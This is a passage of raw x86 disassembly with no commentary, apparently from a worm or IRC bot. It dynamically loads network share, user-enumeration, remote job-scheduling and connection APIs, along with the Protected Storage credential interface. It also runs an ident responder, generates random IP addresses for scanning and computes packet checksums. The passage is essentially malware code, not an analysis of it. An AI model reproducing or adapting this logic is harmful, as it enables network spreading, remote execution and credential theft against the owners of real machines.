jz short loc_403790
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; ntohs
mov [ebp+var_E], ax
loc_403790: ; CODE XREF: sub_403588+1F2�j
and [ebp+var_18], 0
jmp short loc_40379D
; ---------------------------------------------------------------------------
loc_403796: ; CODE XREF: sub_403588:loc_4038A7�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_40379D: ; CODE XREF: sub_403588+20C�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_20]
jnb loc_4038AC
cmp [ebp+arg_8], 0
jz short loc_4037B9
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_40], eax
jmp short loc_4037C0
; ---------------------------------------------------------------------------
loc_4037B9: ; CODE XREF: sub_403588+225�j
mov [ebp+var_40], 4
loc_4037C0: ; CODE XREF: sub_403588+22F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_40]
mov [ecx+eax], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_4037F1
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_44], eax
jmp short loc_4037F8
; ---------------------------------------------------------------------------
loc_4037F1: ; CODE XREF: sub_403588+25C�j
mov [ebp+var_44], 1
loc_4037F8: ; CODE XREF: sub_403588+267�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_44]
mov [ecx+eax+8], edx
cmp [ebp+arg_8], 0
jz short loc_403819
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_48], eax
jmp short loc_403820
; ---------------------------------------------------------------------------
loc_403819: ; CODE XREF: sub_403588+284�j
mov [ebp+var_48], 6
loc_403820: ; CODE XREF: sub_403588+28F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_48]
mov [ecx+eax+0Ch], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+10h], 10h
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
mov ecx, [ebp+var_18]
imul ecx, 30h
mov edx, [ebp+var_1C]
mov [edx+ecx+18h], eax
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_18]
mov eax, [eax+ecx*4]
mov eax, [eax]
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
cmp [ebp+var_18], 0
jz short loc_4038A7
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
add ecx, eax
mov eax, [ebp+var_18]
dec eax
imul eax, 30h
mov edx, [ebp+var_1C]
mov [edx+eax+1Ch], ecx
loc_4038A7: ; CODE XREF: sub_403588+304�j
jmp loc_403796
; ---------------------------------------------------------------------------
loc_4038AC: ; CODE XREF: sub_403588+21B�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_1C]
mov [eax], ecx
xor eax, eax
locret_4038B6: ; CODE XREF: sub_403588+2E�j
; sub_403588+55�j ...
leave
retn 10h
sub_403588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038BA proc near ; DATA XREF: sub_403BD3+1BC�o
var_434 = dword ptr -434h
var_430 = byte ptr -430h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 434h
cmp [ebp+arg_8], 0
jnz short loc_4038CF
cmp [ebp+arg_10], 0
jz short loc_4038D8
loc_4038CF: ; CODE XREF: sub_4038BA+D�j
mov eax, [ebp+arg_18]
and al, 0E0h
test eax, eax
jz short loc_4038ED
loc_4038D8: ; CODE XREF: sub_4038BA+13�j
push 2726h
call dword_417234 ; WSASetLastError
mov eax, 2726h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4038ED: ; CODE XREF: sub_4038BA+1C�j
mov eax, [ebp+arg_0]
mov [ebp+var_40C], eax
mov eax, [ebp+var_40C]
movsx eax, word ptr [eax]
cmp eax, 2
jz short loc_403919
push 273Fh
call dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403919: ; CODE XREF: sub_4038BA+48�j
cmp [ebp+arg_8], 0
jz loc_403ABA
mov eax, [ebp+var_40C]
push dword ptr [eax+4]
call dword_41721C ; inet_ntoa
mov [ebp+var_434], eax
cmp [ebp+var_434], 0
jnz short loc_403949
or eax, 0FFFFFFFFh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403949: ; CODE XREF: sub_4038BA+85�j
push 401h
push [ebp+var_434]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+arg_18]
and eax, 2
test eax, eax
jz short loc_403972
jmp loc_403BB4
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: sub_4038BA+B1�j
mov eax, [ebp+arg_18]
and eax, 4
test eax, eax
jz short loc_4039F4
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_4039AA
call dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039AA: ; CODE XREF: sub_4038BA+E3�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_4039D3
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039D3: ; CODE XREF: sub_4038BA+102�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp loc_403ABA
; ---------------------------------------------------------------------------
loc_4039F4: ; CODE XREF: sub_4038BA+C0�j
mov eax, [ebp+arg_18]
and eax, 1
test eax, eax
jz loc_403A92
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 7F000001h
jz short loc_403A1D
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 0
jnz short loc_403A92
loc_403A1D: ; CODE XREF: sub_4038BA+155�j
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_403A4B
call dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A4B: ; CODE XREF: sub_4038BA+184�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403A74
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A74: ; CODE XREF: sub_4038BA+1A3�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_403ABA
; ---------------------------------------------------------------------------
loc_403A92: ; CODE XREF: sub_4038BA+142�j
; sub_4038BA+161�j ...
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403ABA
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403ABA: ; CODE XREF: sub_4038BA+63�j
; sub_4038BA+135�j ...
cmp [ebp+arg_10], 0
jz loc_403B99
push 8
pop eax
test eax, eax
jz short loc_403B2C
push 0Ah
lea eax, [ebp+var_430]
push eax
mov eax, [ebp+var_40C]
mov ax, [eax+2]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_430]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B19
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403B19: ; CODE XREF: sub_4038BA+248�j
lea eax, [ebp+var_430]
push eax
push [ebp+arg_10]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_403B99
; ---------------------------------------------------------------------------
loc_403B2C: ; CODE XREF: sub_4038BA+20F�j
mov eax, [ebp+arg_18]
and eax, 10h
neg eax
sbb eax, eax
and eax, offset aUdp ; "udp"
push eax
mov eax, [ebp+var_40C]
movzx eax, word ptr [eax+2]
push eax
call dword_417228 ; getservbyport
mov [ebp+var_408], eax
cmp [ebp+var_408], 0
jnz short loc_403B61
or eax, 0FFFFFFFFh
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B61: ; CODE XREF: sub_4038BA+2A0�j
mov eax, [ebp+var_408]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B87
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B87: ; CODE XREF: sub_4038BA+2B9�j
mov eax, [ebp+var_408]
push dword ptr [eax]
push [ebp+arg_10]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403B99: ; CODE XREF: sub_4038BA+204�j
; sub_4038BA+270�j
cmp [ebp+arg_8], 0
jz short loc_403BB0
lea eax, [ebp+var_404]
push eax
push [ebp+arg_8]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403BB0: ; CODE XREF: sub_4038BA+2E3�j
xor eax, eax
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403BB4: ; CODE XREF: sub_4038BA+B3�j
jmp loc_403A92
; ---------------------------------------------------------------------------
locret_403BB9: ; CODE XREF: sub_4038BA+2E�j
; sub_4038BA+5A�j ...
leave
retn 1Ch
sub_4038BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BBD proc near ; DATA XREF: sub_403BD3+1C6�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_403BCF
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
loc_403BCF: ; CODE XREF: sub_403BBD+7�j
pop ebp
retn 4
sub_403BBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD3 proc near ; CODE XREF: sub_4167F1:loc_4168BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset aKernel32_dll ; "kernel32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403C00
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push [ebp+var_C]
call dword_417058 ; GetProcAddress
mov dword_41DE40, eax
loc_403C00: ; CODE XREF: sub_403BD3+18�j
push offset aNetapi32_dll ; "netapi32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_403CC3
push offset aNetusegetinfo ; "NetUseGetInfo"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE48, eax
push offset aNetuseadd ; "NetUseAdd"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE4C, eax
push offset aNetusedel ; "NetUseDel"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE50, eax
push offset aNetuserenum ; "NetUserEnum"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE54, eax
push offset aNetshareenum ; "NetShareEnum"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE58, eax
push offset aNetremotetod ; "NetRemoteTOD"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE5C, eax
push offset aNetapibufferfr ; "NetApiBufferFree"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE60, eax
push offset aNetschedulejob ; "NetScheduleJobAdd"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE64, eax
push offset aNetaddalternat ; "NetAddAlternateComputerName"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DE68, eax
loc_403CC3: ; CODE XREF: sub_403BD3+3F�j
push offset aMpr_dll ; "mpr.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403D23
push offset aWnetaddconnect ; "WNetAddConnection2A"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DE6C, eax
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DE70, eax
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DE74, eax
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DE78, eax
loc_403D23: ; CODE XREF: sub_403BD3+102�j
push offset aWs2_32_dll ; "ws2_32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
push offset aGetaddrinfo ; "getaddrinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DE84, eax
push offset aGetnameinfo ; "getnameinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DE88, eax
push offset aFreeaddrinfo ; "freeaddrinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DE8C, eax
cmp dword_41DE84, 0
jz short loc_403D85
cmp dword_41DE88, 0
jz short loc_403D85
cmp dword_41DE8C, 0
jnz short loc_403DA3
loc_403D85: ; CODE XREF: sub_403BD3+19E�j
; sub_403BD3+1A7�j
mov dword_41DE84, offset sub_403588
mov dword_41DE88, offset sub_4038BA
mov dword_41DE8C, offset sub_403BBD
loc_403DA3: ; CODE XREF: sub_403BD3+1B0�j
push offset aPstorec_dll ; "pstorec.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_403DCA
push offset aPstorecreatein ; "PStoreCreateInstance"
push [ebp+var_10]
call dword_417058 ; GetProcAddress
mov dword_41DE80, eax
loc_403DCA: ; CODE XREF: sub_403BD3+1E2�j
push offset aWininet_dll ; "wininet.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short locret_403DF1
push offset aInternetgetcon ; "InternetGetConnectedStateExA"
push [ebp+var_18]
call dword_417058 ; GetProcAddress
mov dword_41DE7C, eax
locret_403DF1: ; CODE XREF: sub_403BD3+209�j
leave
retn
sub_403BD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF3 proc near ; DATA XREF: sub_403FE5+89�o
var_1228 = dword ptr -1228h
var_1224 = byte ptr -1224h
var_1200 = byte ptr -1200h
var_11DC = byte ptr -11DCh
var_11B8 = dword ptr -11B8h
var_11B4 = dword ptr -11B4h
var_11B0 = dword ptr -11B0h
var_11AC = byte ptr -11ACh
var_11A6 = byte ptr -11A6h
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1228h
call sub_416BC0
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_11B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_11AC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_11B4], eax
cmp [ebp+var_11B4], 0
jnz short loc_403E52
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_403FE1
; ---------------------------------------------------------------------------
loc_403E52: ; CODE XREF: sub_403DF3+4A�j
lea eax, [ebp+var_11AC]
push eax
mov eax, [ebp+var_11B0]
push dword ptr [eax]
push offset dword_4189C4
lea eax, [ebp+var_11A6]
push eax
call sub_40D53F
add esp, 10h
loc_403E75: ; CODE XREF: sub_403DF3+BD�j
; sub_403DF3+10F�j ...
push 3E8h
push [ebp+var_11B4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_11B8], eax
mov eax, [ebp+var_11B0]
cmp dword ptr [eax+4], 0
jnz short loc_403EA2
cmp [ebp+var_11B8], 0
jnz short loc_403EA7
loc_403EA2: ; CODE XREF: sub_403DF3+A4�j
jmp loc_403FC7
; ---------------------------------------------------------------------------
loc_403EA7: ; CODE XREF: sub_403DF3+AD�j
cmp [ebp+var_11B8], 0FFFFFFFFh
jnz short loc_403EB2
jmp short loc_403E75
; ---------------------------------------------------------------------------
loc_403EB2: ; CODE XREF: sub_403DF3+BB�j
push 1000h
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_1228], eax
cmp [ebp+var_1228], 0
jz short loc_403EF6
cmp [ebp+var_1228], 0FFFFFFFFh
jz short loc_403EF6
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 10h
jbe short loc_403F07
loc_403EF6: ; CODE XREF: sub_403DF3+E6�j
; sub_403DF3+EF�j
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403F07: ; CODE XREF: sub_403DF3+101�j
movsx eax, byte_41EEC8
test eax, eax
jz short loc_403F27
push offset byte_41EEC8
lea eax, [ebp+var_1224]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_403F57
; ---------------------------------------------------------------------------
loc_403F27: ; CODE XREF: sub_403DF3+11D�j
lea eax, [ebp+var_1200]
push eax
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_11DC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1224]
push eax
push offset byte_41EEC8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403F57: ; CODE XREF: sub_403DF3+132�j
push offset aUseridUnix ; " : USERID : UNIX : "
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053BF
add esp, 0Ch
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403DF3:loc_403EA2�j
push [ebp+var_11B4]
call sub_404CBB
pop ecx
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
locret_403FE1: ; CODE XREF: sub_403DF3+5A�j
leave
retn 4
sub_403DF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE5 proc near ; CODE XREF: sub_40A9CF+EEC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_403FFD
push [ebp+arg_4]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_404004
loc_403FFD: ; CODE XREF: sub_403FE5+9�j
mov [ebp+arg_4], offset dword_418A18
loc_404004: ; CODE XREF: sub_403FE5+16�j
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40401A
jmp short locret_40407B
; ---------------------------------------------------------------------------
loc_40401A: ; CODE XREF: sub_403FE5+31�j
push 6
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
cmp [ebp+arg_0], 0
jz short loc_404059
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
test eax, eax
jz short loc_404059
and [ebp+var_8], 0
jmp short loc_404060
; ---------------------------------------------------------------------------
loc_404059: ; CODE XREF: sub_403FE5+5E�j
; sub_403FE5+6C�j
mov [ebp+var_8], 1
loc_404060: ; CODE XREF: sub_403FE5+72�j
push [ebp+arg_4]
push offset dword_4189F8
push [ebp+var_8]
push [ebp+var_4]
push offset sub_403DF3
call sub_4095A4
add esp, 14h
locret_40407B: ; CODE XREF: sub_403FE5+33�j
leave
retn
sub_403FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40407D proc near ; CODE XREF: sub_4055E5+772�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404085: ; CODE XREF: sub_40407D+2C�j
cmp [ebp+arg_4], 1
jbe short loc_4040AB
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404085
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_40407D+C�j
cmp [ebp+arg_4], 0
jz short loc_4040BF
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4040BF: ; CODE XREF: sub_40407D+32�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
not eax
leave
retn
sub_40407D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E8 proc near ; CODE XREF: sub_4055E5+752�p
; sub_40A9CF+1A2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jz short loc_404146
cmp [ebp+var_4], 3
jz short loc_404124
cmp [ebp+var_4], 4
jz short loc_404106
jmp short loc_40416A
; ---------------------------------------------------------------------------
loc_404106: ; CODE XREF: sub_4040E8+1A�j
mov eax, [ebp+arg_0]
and al, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404124: ; CODE XREF: sub_4040E8+14�j
mov eax, [ebp+arg_0]
and ah, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 8
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404146: ; CODE XREF: sub_4040E8+E�j
mov eax, [ebp+arg_0]
and eax, 0FF00FFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 10h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_40416A: ; CODE XREF: sub_4040E8+1C�j
mov eax, [ebp+arg_0]
and eax, 0FFFFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 18h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
mov eax, [ebp+arg_0]
leave
retn
sub_4040E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404193 proc near ; CODE XREF: sub_404279+A�p
; sub_40435B+17�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0Ah
push [ebp+arg_0]
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
pop ebp
retn
sub_404193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B7 proc near ; CODE XREF: sub_40D871+5B3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push offset dword_418A48
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041D5
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_4041B7+17�j
push 4
push offset dword_418A40
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041F0
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041F0: ; CODE XREF: sub_4041B7+32�j
push 8
push offset dword_418A34
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40420B
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_40420B: ; CODE XREF: sub_4041B7+4D�j
push 3
push offset dword_418A30
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_404226
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_4041B7+68�j
xor eax, eax
loc_404228: ; CODE XREF: sub_4041B7+1C�j
; sub_4041B7+37�j ...
pop ebp
retn
sub_4041B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40422A proc near ; CODE XREF: sub_402A32+206�p
; sub_403FE5+E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_40423C
; ---------------------------------------------------------------------------
loc_404235: ; CODE XREF: sub_40422A:loc_404273�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40423C: ; CODE XREF: sub_40422A+9�j
cmp [ebp+var_4], 6
jnz short loc_404244
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_404244: ; CODE XREF: sub_40422A+16�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_404273
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40426C
cmp [ebp+var_8], 0FFFFh
jbe short loc_40426E
loc_40426C: ; CODE XREF: sub_40422A+37�j
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_40426E: ; CODE XREF: sub_40422A+40�j
push 1
pop eax
jmp short locret_404277
; ---------------------------------------------------------------------------
loc_404273: ; CODE XREF: sub_40422A+25�j
jmp short loc_404235
; ---------------------------------------------------------------------------
loc_404275: ; CODE XREF: sub_40422A+18�j
; sub_40422A:loc_40426C�j
xor eax, eax
locret_404277: ; CODE XREF: sub_40422A+47�j
leave
retn
sub_40422A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404279 proc near ; CODE XREF: sub_4042FB+C�p
; sub_408B30+197�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_8]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4042A4
push 1
pop eax
jmp short locret_4042F9
; ---------------------------------------------------------------------------
loc_4042A4: ; CODE XREF: sub_404279+24�j
push 0BB8h
push 0
lea eax, [ebp+var_8]
push eax
push offset dword_41EF48
call sub_4050EA
add esp, 10h
mov [ebp+var_C], eax
push [ebp+var_10]
call sub_404CBB
pop ecx
cmp [ebp+var_C], 0
jz short loc_4042DA
cmp [ebp+var_C], 0FFFFFFFFh
jz short loc_4042DA
and [ebp+var_18], 0
jmp short loc_4042E1
; ---------------------------------------------------------------------------
loc_4042DA: ; CODE XREF: sub_404279+53�j
; sub_404279+59�j
mov [ebp+var_18], 1
loc_4042E1: ; CODE XREF: sub_404279+5F�j
mov eax, [ebp+var_18]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4042F6
push [ebp+var_C]
call sub_4053B1
pop ecx
loc_4042F6: ; CODE XREF: sub_404279+72�j
mov eax, [ebp+var_14]
locret_4042F9: ; CODE XREF: sub_404279+29�j
leave
retn
sub_404279 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042FB proc near ; CODE XREF: sub_411D68+4�p
; sub_41349C+1FA�p ...
push ebp
mov ebp, esp
cmp dword_41E294, 0
jnz short loc_404327
call sub_404279
push eax
push offset dword_41E298
call sub_409C9D
pop ecx
pop ecx
push 1
